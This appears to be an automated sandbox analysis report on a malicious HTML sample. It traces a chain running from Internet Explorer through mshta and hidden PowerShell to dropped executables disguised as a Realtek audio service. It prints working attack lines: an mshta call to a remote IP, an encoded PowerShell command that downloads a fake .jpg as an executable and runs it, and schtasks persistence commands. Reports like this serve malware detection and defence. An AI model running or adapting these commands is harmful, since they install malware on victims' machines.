Analysis
-
max time kernel
147s -
max time network
151s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
28-04-2024 12:49
Static task
static1
Behavioral task
behavioral1
Sample
053aaab62e8b79a398c655ac0834266e_JaffaCakes118.html
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
053aaab62e8b79a398c655ac0834266e_JaffaCakes118.html
Resource
win10v2004-20240419-en
General
-
Target
053aaab62e8b79a398c655ac0834266e_JaffaCakes118.html
-
Size
24KB
-
MD5
053aaab62e8b79a398c655ac0834266e
-
SHA1
f8c104b21b30205d2f01da8b9414b419fa3f3b6d
-
SHA256
040d2a867b810e66ba577377c79391aca97401e0a9dd7253143838195bf05698
-
SHA512
61f49b177826c2e2ba3fb3c0d2d03717911be904adcd4b6edff9246fa63c6e2b98bbcc5438f3faa4ccdfc441f4abcd2908a6c8886ac9b118066b2cbadd13f79c
-
SSDEEP
384:Jd5RkvCxSQEqj9SGBtUaYGIq9Y02aY/JM:JLRkvrQEjGBtIan
Malware Config
Extracted
http://74.208.13.22/csf/hta.html
Extracted
http://74.208.13.22/csf/rl8.jpg
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
mshta.exepowershell.exeflow pid process 11 2496 mshta.exe 12 2648 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 14 IoCs
Processes:
atum2l.exejmT10Kiw8wsh.exejmT10Kiw8wsh.exeJItFuBsW12fN.exeRealtekAudio.exeRealtekAudio.exeRealtekAudio.exeRealtekAudio.exeRealtekAudio.exeRealtekAudio.exeRealtekAudio.exeRealtekAudio.exeRealtekAudio.exeRealtekAudio.exepid process 592 atum2l.exe 2696 jmT10Kiw8wsh.exe 1156 jmT10Kiw8wsh.exe 2812 JItFuBsW12fN.exe 1836 RealtekAudio.exe 2832 RealtekAudio.exe 2964 RealtekAudio.exe 324 RealtekAudio.exe 2208 RealtekAudio.exe 2912 RealtekAudio.exe 1972 RealtekAudio.exe 2064 RealtekAudio.exe 2448 RealtekAudio.exe 2220 RealtekAudio.exe -
Loads dropped DLL 13 IoCs
Processes:
powershell.exejmT10Kiw8wsh.exejmT10Kiw8wsh.exeJItFuBsW12fN.exepid process 2648 powershell.exe 2648 powershell.exe 2648 powershell.exe 2696 jmT10Kiw8wsh.exe 1156 jmT10Kiw8wsh.exe 1156 jmT10Kiw8wsh.exe 1156 jmT10Kiw8wsh.exe 1156 jmT10Kiw8wsh.exe 1156 jmT10Kiw8wsh.exe 1156 jmT10Kiw8wsh.exe 1156 jmT10Kiw8wsh.exe 1156 jmT10Kiw8wsh.exe 2812 JItFuBsW12fN.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 15 api.ipstack.com 17 api.ipify.org -
Detects Pyinstaller 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\jmT10Kiw8wsh.exe pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 1112 schtasks.exe 1952 schtasks.exe 1984 schtasks.exe 2332 schtasks.exe 1792 schtasks.exe 2388 schtasks.exe 2916 schtasks.exe 2176 schtasks.exe 1440 schtasks.exe 676 schtasks.exe 2384 schtasks.exe -
Processes:
iexplore.exemshta.exeIEXPLORE.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{CEBAC9E1-055D-11EF-B2DC-EA263619F6CB} = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "420470461" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE -
Runs ping.exe 1 TTPs 10 IoCs
Processes:
PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEpid process 2916 PING.EXE 2748 PING.EXE 2408 PING.EXE 2416 PING.EXE 540 PING.EXE 2684 PING.EXE 2056 PING.EXE 2320 PING.EXE 2012 PING.EXE 2264 PING.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2648 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2648 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
iexplore.exepid process 2896 iexplore.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
iexplore.exeIEXPLORE.EXEpid process 2896 iexplore.exe 2896 iexplore.exe 2944 IEXPLORE.EXE 2944 IEXPLORE.EXE 2944 IEXPLORE.EXE 2944 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
iexplore.exeIEXPLORE.EXEmshta.exepowershell.exeatum2l.exejmT10Kiw8wsh.exeJItFuBsW12fN.exeRealtekAudio.execmd.exeRealtekAudio.execmd.exedescription pid process target process PID 2896 wrote to memory of 2944 2896 iexplore.exe IEXPLORE.EXE PID 2896 wrote to memory of 2944 2896 iexplore.exe IEXPLORE.EXE PID 2896 wrote to memory of 2944 2896 iexplore.exe IEXPLORE.EXE PID 2896 wrote to memory of 2944 2896 iexplore.exe IEXPLORE.EXE PID 2944 wrote to memory of 2496 2944 IEXPLORE.EXE mshta.exe PID 2944 wrote to memory of 2496 2944 IEXPLORE.EXE mshta.exe PID 2944 wrote to memory of 2496 2944 IEXPLORE.EXE mshta.exe PID 2944 wrote to memory of 2496 2944 IEXPLORE.EXE mshta.exe PID 2496 wrote to memory of 2648 2496 mshta.exe powershell.exe PID 2496 wrote to memory of 2648 2496 mshta.exe powershell.exe PID 2496 wrote to memory of 2648 2496 mshta.exe powershell.exe PID 2496 wrote to memory of 2648 2496 mshta.exe powershell.exe PID 2648 wrote to memory of 592 2648 powershell.exe atum2l.exe PID 2648 wrote to memory of 592 2648 powershell.exe atum2l.exe PID 2648 wrote to memory of 592 2648 powershell.exe atum2l.exe PID 2648 wrote to memory of 592 2648 powershell.exe atum2l.exe PID 592 wrote to memory of 2696 592 atum2l.exe jmT10Kiw8wsh.exe PID 592 wrote to memory of 2696 592 atum2l.exe jmT10Kiw8wsh.exe PID 592 wrote to memory of 2696 592 atum2l.exe jmT10Kiw8wsh.exe PID 592 wrote to memory of 2696 592 atum2l.exe jmT10Kiw8wsh.exe PID 2696 wrote to memory of 1156 2696 jmT10Kiw8wsh.exe jmT10Kiw8wsh.exe PID 2696 wrote to memory of 1156 2696 jmT10Kiw8wsh.exe jmT10Kiw8wsh.exe PID 2696 wrote to memory of 1156 2696 jmT10Kiw8wsh.exe jmT10Kiw8wsh.exe PID 2696 wrote to memory of 1156 2696 jmT10Kiw8wsh.exe jmT10Kiw8wsh.exe PID 592 wrote to memory of 2812 592 atum2l.exe JItFuBsW12fN.exe PID 592 wrote to memory of 2812 592 atum2l.exe JItFuBsW12fN.exe PID 592 wrote to memory of 2812 592 atum2l.exe JItFuBsW12fN.exe PID 592 wrote to memory of 2812 592 atum2l.exe JItFuBsW12fN.exe PID 2812 wrote to memory of 1112 2812 JItFuBsW12fN.exe schtasks.exe PID 2812 wrote to memory of 1112 2812 JItFuBsW12fN.exe schtasks.exe PID 2812 wrote to memory of 1112 2812 JItFuBsW12fN.exe schtasks.exe PID 2812 wrote to memory of 1112 2812 JItFuBsW12fN.exe schtasks.exe PID 2812 wrote to memory of 1836 2812 JItFuBsW12fN.exe RealtekAudio.exe PID 2812 wrote to memory of 1836 2812 JItFuBsW12fN.exe RealtekAudio.exe PID 2812 wrote to memory of 1836 2812 JItFuBsW12fN.exe RealtekAudio.exe PID 2812 wrote to memory of 1836 2812 JItFuBsW12fN.exe RealtekAudio.exe PID 1836 wrote to memory of 1952 1836 RealtekAudio.exe schtasks.exe PID 1836 wrote to memory of 1952 1836 RealtekAudio.exe schtasks.exe PID 1836 wrote to memory of 1952 1836 RealtekAudio.exe schtasks.exe PID 1836 wrote to memory of 1952 1836 RealtekAudio.exe schtasks.exe PID 1836 wrote to memory of 784 1836 RealtekAudio.exe cmd.exe PID 1836 wrote to memory of 784 1836 RealtekAudio.exe cmd.exe PID 1836 wrote to memory of 784 1836 RealtekAudio.exe cmd.exe PID 1836 wrote to memory of 784 1836 RealtekAudio.exe cmd.exe PID 784 wrote to memory of 2916 784 cmd.exe PING.EXE PID 784 wrote to memory of 2916 784 cmd.exe PING.EXE PID 784 wrote to memory of 2916 784 cmd.exe PING.EXE PID 784 wrote to memory of 2916 784 cmd.exe PING.EXE PID 784 wrote to memory of 2832 784 cmd.exe RealtekAudio.exe PID 784 wrote to memory of 2832 784 cmd.exe RealtekAudio.exe PID 784 wrote to memory of 2832 784 cmd.exe RealtekAudio.exe PID 784 wrote to memory of 2832 784 cmd.exe RealtekAudio.exe PID 2832 wrote to memory of 1984 2832 RealtekAudio.exe schtasks.exe PID 2832 wrote to memory of 1984 2832 RealtekAudio.exe schtasks.exe PID 2832 wrote to memory of 1984 2832 RealtekAudio.exe schtasks.exe PID 2832 wrote to memory of 1984 2832 RealtekAudio.exe schtasks.exe PID 2832 wrote to memory of 1604 2832 RealtekAudio.exe cmd.exe PID 2832 wrote to memory of 1604 2832 RealtekAudio.exe cmd.exe PID 2832 wrote to memory of 1604 2832 RealtekAudio.exe cmd.exe PID 2832 wrote to memory of 1604 2832 RealtekAudio.exe cmd.exe PID 1604 wrote to memory of 2748 1604 cmd.exe PING.EXE PID 1604 wrote to memory of 2748 1604 cmd.exe PING.EXE PID 1604 wrote to memory of 2748 1604 cmd.exe PING.EXE PID 1604 wrote to memory of 2748 1604 cmd.exe PING.EXE
Processes
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\053aaab62e8b79a398c655ac0834266e_JaffaCakes118.html1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2896 CREDAT:275457 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\mshta.exemshta http://74.208.13.22/csf/hta.html3⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -encodedCommand "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA3ADQALgAyADAAOAAuADEAMwAuADIAMgAvAGMAcwBmAC8AcgBsADgALgBqAHAAZwAnACwAIAAnAGMAOgAvAHcAaQBuAGQAbwB3AHMALwB0AGUAbQBwAC8AYQB0AHUAbQAyAGwALgBlAHgAZQAnACkAOwBjADoALwB3AGkAbgBkAG8AdwBzAC8AdABlAG0AcAAvAGEAdAB1AG0AMgBsAC4AZQB4AGUA"4⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\windows\temp\atum2l.exe"C:\windows\temp\atum2l.exe"5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\jmT10Kiw8wsh.exe"C:\Users\Admin\AppData\Local\Temp\jmT10Kiw8wsh.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\jmT10Kiw8wsh.exe"C:\Users\Admin\AppData\Local\Temp\jmT10Kiw8wsh.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\JItFuBsW12fN.exe"C:\Users\Admin\AppData\Local\Temp\JItFuBsW12fN.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Realtek Audio Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\JItFuBsW12fN.exe" /rl HIGHEST /f7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Realtek\RealtekAudio.exe"C:\Users\Admin\AppData\Roaming\Realtek\RealtekAudio.exe"7⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Realtek Audio Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Realtek\RealtekAudio.exe" /rl HIGHEST /f8⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\S2n0bZU0WMwk.bat" "8⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost9⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Roaming\Realtek\RealtekAudio.exe"C:\Users\Admin\AppData\Roaming\Realtek\RealtekAudio.exe"9⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Realtek Audio Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Realtek\RealtekAudio.exe" /rl HIGHEST /f10⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\e4gHLGqofRJY.bat" "10⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost11⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Roaming\Realtek\RealtekAudio.exe"C:\Users\Admin\AppData\Roaming\Realtek\RealtekAudio.exe"11⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Realtek Audio Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Realtek\RealtekAudio.exe" /rl HIGHEST /f12⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\sdFS7UlrdLVM.bat" "12⤵
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost13⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Roaming\Realtek\RealtekAudio.exe"C:\Users\Admin\AppData\Roaming\Realtek\RealtekAudio.exe"13⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Realtek Audio Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Realtek\RealtekAudio.exe" /rl HIGHEST /f14⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\VO8sstS0G7MZ.bat" "14⤵
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost15⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Roaming\Realtek\RealtekAudio.exe"C:\Users\Admin\AppData\Roaming\Realtek\RealtekAudio.exe"15⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Realtek Audio Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Realtek\RealtekAudio.exe" /rl HIGHEST /f16⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EAelCnUnvWca.bat" "16⤵
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost17⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Roaming\Realtek\RealtekAudio.exe"C:\Users\Admin\AppData\Roaming\Realtek\RealtekAudio.exe"17⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Realtek Audio Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Realtek\RealtekAudio.exe" /rl HIGHEST /f18⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\z0O3AYuBtuc6.bat" "18⤵
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost19⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Roaming\Realtek\RealtekAudio.exe"C:\Users\Admin\AppData\Roaming\Realtek\RealtekAudio.exe"19⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Realtek Audio Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Realtek\RealtekAudio.exe" /rl HIGHEST /f20⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\el5Dihle2VBD.bat" "20⤵
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost21⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Roaming\Realtek\RealtekAudio.exe"C:\Users\Admin\AppData\Roaming\Realtek\RealtekAudio.exe"21⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Realtek Audio Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Realtek\RealtekAudio.exe" /rl HIGHEST /f22⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\yqcw2sS5CBxq.bat" "22⤵
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost23⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Roaming\Realtek\RealtekAudio.exe"C:\Users\Admin\AppData\Roaming\Realtek\RealtekAudio.exe"23⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Realtek Audio Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Realtek\RealtekAudio.exe" /rl HIGHEST /f24⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\abVMnH9Fqxo3.bat" "24⤵
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost25⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Roaming\Realtek\RealtekAudio.exe"C:\Users\Admin\AppData\Roaming\Realtek\RealtekAudio.exe"25⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Realtek Audio Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Realtek\RealtekAudio.exe" /rl HIGHEST /f26⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\VTgr8G3aLmuH.bat" "26⤵
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost27⤵
- Runs ping.exe
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015Filesize
344B
MD5e64328abd0999a6da890a2acd31db5d0
SHA17d506a7eb6c05f3a5f246f1ed093b6e835975749
SHA256d4c6381ca26ab71e327de554ad93a3c91b1867b71c5984b5e1fb8e2af8ab9dd0
SHA512a61254f662f39bf791402c0716c7dc4cbe5ff012b23f094d52068e34611e3099537c92e09b8704b4cdcf18c912cf1e0908dc5daa03f1fc419b18aadc138ab140
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015Filesize
344B
MD58ffdc0d29017ed7c8dd54d2745a2d634
SHA1f53282ebc3ac0e9a00a5005b10c89f334139258e
SHA256a7bcd4b825df470eddfac732aa2e9a95f3bf5b2b2907cc2c4449c2fb65a83277
SHA51212d8febbfd70a78285d961d16d72251da144698e883d87d1272cddfdb4be9546ad049435ed0665584c090c37e17d1a019518ced27a242d800e1cfdc30e504e41
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015Filesize
344B
MD5ac97c2023db0588afb3c27a544613c59
SHA1c943ed0f1079f98102f7d47c2028927227c4f966
SHA2561ed7aba070ff3b9c86e04bf7272050b7581a9c87a75e327bd75a72c8add35a89
SHA512b8f09216c23654f92581e34fe46d7f62ea8e6a0181a563e3cf83986f009dadf6af983a295ec16d0c9aa9ab7513584db0374c7b97a559b301e6c0987b251decaf
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015Filesize
344B
MD5f6a45c41f54ed0509f6d20985d15873e
SHA1b7bc67116ce1acfc60a3dbc32fdc9f24f89c6469
SHA256e96a4465a6a3ad53facc6c6720692951f71b9f81ce2d4e613c437689f003c4fa
SHA512f05824941486c82dbaaf74da57fed1e15871aec29a506f9431f0a3d35558c00e2f053db16ce6ec5fbbd7a4781665f4ea49625f98bd5b93bf1919f9036a076ddc
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015Filesize
344B
MD5d422c616b4d20c7a6184c0c531142a11
SHA1488c78a94ffe81b3fea8de1449fe080665889631
SHA256fe15e50c1188d5ed923e5a92157b6a5c7c49aa84c76a7b327d9e328c9a92ef85
SHA5129f4e2126f7800a61cee3907ddaec3a043f45b1f232f3532cbd5bc7eec60a798e0b0c405149cc12ce66251ac0a8344eb307a513738335243e5e80252c2a1ad7f3
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015Filesize
344B
MD5cb6b86f1315a3d79ce211d1314c4a36b
SHA1d9710408c6e13ac6cbbafb1afb93fd385e8caec1
SHA256cf8edc6204d990bba182f8aaab7bc9f43db683090cb678dc0d2ba7fabedaf409
SHA512ba2a40a3e416676c118652824c743d85e90c42a17ec766055ac2e245d2191fa76f412f4caa69c13daaf54e6d1aaa0c7fe70bee44ae6c282e730287ce3fbe2319
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015Filesize
344B
MD547e3f82ee0fb0ad512c302d9249f467f
SHA1b2eb866d52f3a3f20d7809e97cf05ec4abf92bc2
SHA256604dd48357e2ba8137f5470131f17187fc7f731bd6ba07a14b3c037b9a94546c
SHA5120fc77cae0f0b672dcd6c74a75a0b2907bddf5c8c694241972a8b9a511ceb3f7f32db60618ef7c93ead2ed5df08e595bd322414b681014dfb5fcde8f3bf42d072
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015Filesize
344B
MD5bdc213c4bd4f0b5c96ef6e7aac753886
SHA1612f7bfa391fc2085ab52c36fae66690aa103333
SHA256c8eca550bbb984f38653bd2e27724a53cded2a07b549baa0d260df6bf88c69d2
SHA512aac80ccc094477ce10c03ae90618cc80ae21517e2ae486ada2fd57d50615016635b1d5416526b76715ab5c0ff54200a8bdf1210b87efb328732196593b6d643a
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015Filesize
344B
MD5744102816f1d0d03b63c545e51d44bd3
SHA18f185fd941c1c64c04c1de89c418dc2e216f4c4a
SHA25639f605d0ed31af91064ae14d305dc3b843deafeb25b00149f65a98647afbeb7b
SHA5126e709ed3bcb8cf1a7581ee7350936804f13b6c1e72d338bd7e5b32b56efa38b05d72ae46b3c0ef6457e1779f3d87139bb10c5782fa33cd49cb3757886f9dbec6
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015Filesize
344B
MD540a233b7424cefc5dca772d2b5501fa9
SHA10623013f51f34f17cabb67e98eed8587ae5f4044
SHA256968c95dc362c697f97280c93466f586dc26a2d20911fbb3a25b5bb2758ccf806
SHA512cd83571da14f05e894cfa58d4b8de5bf3683b91a9041be8bd0e3606f6de1303b9f0dd0aa86c93424ae26137220c8c4970cecf30f7744037319b802a827b06d72
-
C:\Users\Admin\AppData\Local\Temp\Cab8C49.tmpFilesize
65KB
MD5ac05d27423a85adc1622c714f2cb6184
SHA1b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA5126d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d
-
C:\Users\Admin\AppData\Local\Temp\Cab8D07.tmpFilesize
68KB
MD529f65ba8e88c063813cc50a4ea544e93
SHA105a7040d5c127e68c25d81cc51271ffb8bef3568
SHA2561ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa
-
C:\Users\Admin\AppData\Local\Temp\EAelCnUnvWca.batFilesize
172B
MD52db044e41d78d6a948f9402355f80c55
SHA1a1301c03088124a66effe1368739bf7734d53be8
SHA256c0b158c71837198153e4c4604285d85bea12f13ea8baddf6bcd517583825b3cb
